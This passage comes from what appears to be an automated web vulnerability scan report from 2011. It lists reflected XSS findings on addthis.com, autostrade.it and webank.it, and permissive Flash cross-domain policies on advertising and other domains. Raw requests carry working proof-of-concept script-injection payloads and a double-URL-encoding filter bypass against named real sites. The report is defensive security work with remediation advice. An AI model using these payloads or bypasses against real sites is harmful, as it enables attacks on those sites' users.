Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7e58f"><script>alert(1)</script>ec94702f118

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96631

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=7e58f"><script>alert(1)</script>ec94702f118" />
...[SNIP]...

4.52. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc was submitted in the Referer HTTP header. This input was echoed as a4664";alert(1)//c4f26dbd9fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96589

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc";addthis_title="a4664";alert(1)//c4f26dbd9fc - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

4.53. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a8199<script>alert(1)</script>9d3863d50ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a8199<script>alert(1)</script>9d3863d50ae

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96613

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>9d3863d50ae";addthis_title="a8199<script>alert(1)</script>9d3863d50ae - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

4.54. http://www.autostrade.it/autostrade/jsonBridge [JSESSIONID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autostrade.it
Path:   /autostrade/jsonBridge

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 416eb<script>alert(1)</script>ad99e449219 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /autostrade/jsonBridge?srvc=homecams&op=tlcTmb&codArea=ALL&ntlc=30 HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e449219

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:15:23 GMT
Server: Autostrade
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
x-wily-info: Clear guid=B2C7B7DB7F000001770971923379B679
x-wily-servlet: Clear appServerIp=127.0.0.1&agentName=bau18&servletName=JsonBridgeServlet&agentHost=n0611733&agentProcess=JBoss
Cache-Control: no-store, no-cache, must-revalidate
Set-Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e449219; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: application/json;charset=UTF-8
Content-Language: it
Content-Length: 4318

{"token":"99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e4492191304374524694","tlcs":[{"tlc":"26969","thumb":"/autostrade/FrameTelecamera?tipo=T&tlc=26969","description":"A1 Diramazione Roma nord - GRA Km. 09,9 Castelnuovo di Porto"},{"tlc":"38914","thumb":"/autos
...[SNIP]...

4.55. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [ultimeTrePagine cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60622'-alert(1)-'66d057b537f was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_conti_nw!pro_wbn_apri_conto_webank!*!*60622'-alert(1)-'66d057b537f; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:11:33 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script type="text/javascript">
           document.cookie = 'ultimeTrePagine='+'*!*!*!*:*!*!*!*:nav_pub_wb_conti_nw!pro_wbn_apri_conto_webank!*!*60622'-alert(1)-'66d057b537f';
           var srvTs = '1304381493725';
       
           var hp_visual = 'null';
   
       </script>
...[SNIP]...

4.56. https://www.webank.it/webankpub/wb/fpServizi.do [ultimeTrePagine cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/fpServizi.do

Issue detail

The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad1b'-alert(1)-'d7d638a9938 was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/fpServizi.do?tabId=nav_pub_wb_serveaiuto_nw&OBS_KEY=pro_wbn_serve_aiuto HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: https://www.webank.it/webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*cad1b'-alert(1)-'d7d638a9938; openedLogin=true; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:12:44 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 45064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script type="text/javascript">
           document.cookie = 'ultimeTrePagine='+'*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*cad1b'-alert(1)-'d7d638a9938:nav_pub_wb_serveaiuto_nw!pro_wbn_serve_aiuto!*!*';
           var srvTs = '1304381564979';
       
           var hp_visual = 'null';
   
       </script>
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 41 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad-emea.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Mon, 02 May 2011 22:45:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.2. http://ad78.neodatagroup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad78.neodatagroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad78.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8989-c9-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:17:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.3. http://adlev.neodatagroup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adlev.neodatagroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adlev.neodatagroup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:21:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT
ETag: "5d8989-c9-475babd3b7580"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 22:21:47 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.4. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 22:33:24 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.5. http://cdn1.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn1.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn1.eyewonder.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 07 Nov 2008 23:34:25 GMT
ETag: "4418f35e3141c91:139e"
Content-Length: 195
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Cache-Control: max-age=2828
Expires: Mon, 02 May 2011 23:04:13 GMT
Date: Mon, 02 May 2011 22:17:05 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

5.6. http://cdn4.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:40 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://documenti.camera.it/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://documenti.camera.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: documenti.camera.it

Response

HTTP/1.0 200 OK
Cache-Control: No-Cache
Pragma: No-Cache
Content-Length: 1225
Content-Type: text/xml
Last-Modified: Tue, 25 Jan 2011 14:36:58 GMT
Accept-Ranges: bytes
ETag: "371bff519dbccb1:16c7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 22:24:34 GMT
X-Cache: MISS from ns1.camera.it
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
<allow-access-from domain="http://www.camera.it" />
   <allow-access-from domain="http://leg16.camera.it" />
   <allow-access-from domain="www.camera.it" />
   <allow-access-from domain="*.camera.it" />
   <allow-access-from domain="http://nuovo.camera.it" />
   <allow-access-from domain="nuovo.camera.it" />
   <allow-access-from domain="*.nuovo.camera.it" />
   <allow-access-from domain="http://xm.intra.camera.it" />
   <allow-access-from domain="*.xm.intra.camera.it" />
   <allow-access-from domain="xm.intra.camera.it" />
   <allow-access-from domain="http://xmtenderinter.intra.camera.it" />
   <allow-access-from domain="*.xmtenderinter.intra.camera.it" />
   <allow-access-from domain="xmtenderinter.intra.camera.it" />
   <allow-access-from domain="http://nuovo.intra.camera.it" />
   <allow-access-from domain="*.nuovo.intra.camera.it" />
   <allow-access-from domain="nuovo.intra.camera.it" />
...[SNIP]...

5.8. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 22:33:24 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.9. http://elstatic.weborama.fr/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://elstatic.weborama.fr
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: elstatic.weborama.fr

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/xml
Date: Mon, 02 May 2011 23:05:02 GMT
ETag: "1171997018"
Expires: Mon, 09 May 2011 23:05:02 GMT
Last-Modified: Thu, 13 Dec 2007 13:37:01 GMT
Server: ECAcc (dca/53CF)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.10. https://eprocurement.eni.it/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://eprocurement.eni.it
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: eprocurement.eni.it

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Wed, 23 Mar 2011 10:31:45 GMT
Accept-Ranges: bytes
ETag: "1735e18145e9cb1:12e6"
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 22:24:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.11. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 02 May 2011 02:36:42 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 70867
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.12. http://ieo.solution.weborama.fr/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ieo.solution.weborama.fr

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
Last-Modified: Mon, 20 Oct 2008 13:27:23 GMT
ETag: "2a8005-6c-459af467404c0"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.13. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:16 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19978
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.14. http://metrics.ilsole24ore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ilsole24ore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ilsole24ore.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www313
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.15. http://mfr.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mfr.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mfr.247realmedia.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT
ETag: "3fd213-d0-4436057df0e40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8445525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
